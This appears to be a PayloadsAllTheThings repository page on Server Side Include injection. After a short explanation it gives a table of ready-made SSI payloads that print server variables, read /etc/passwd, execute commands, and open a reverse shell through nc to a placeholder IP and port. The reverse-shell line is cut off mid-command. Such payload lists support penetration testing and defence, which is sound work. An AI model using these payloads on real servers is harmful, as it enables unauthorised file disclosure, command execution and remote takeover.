PayloadsAllTheThings/Server Side Include Injection
2024-11-10 19:14:16 +01:00
..
README.md Normalize page header for SSTI, SAML, SSI 2024-11-10 19:14:16 +01:00

Server Side Include Injection

Server Side Includes (SSI) are directives that are placed in HTML pages and evaluated on the server while the pages are being served. They let you add dynamically generated content to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.

Summary

Methodology

SSI Injection occurs when an attacker can input Server Side Include directives into a web application. SSIs are directives that can include files, execute commands, or print environment variables/attributes. If user input is not properly sanitized within an SSI context, this input can be used to manipulate server-side behavior and access sensitive information or execute commands.

Description Payload
Print a date <!--#echo var="DATE_LOCAL" -->
Print all the variables <!--#printenv -->
Include a file <!--#include file="/etc/passwd" -->
Execute commands <!--#exec cmd="ls" -->
Doing a reverse shell `<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo

References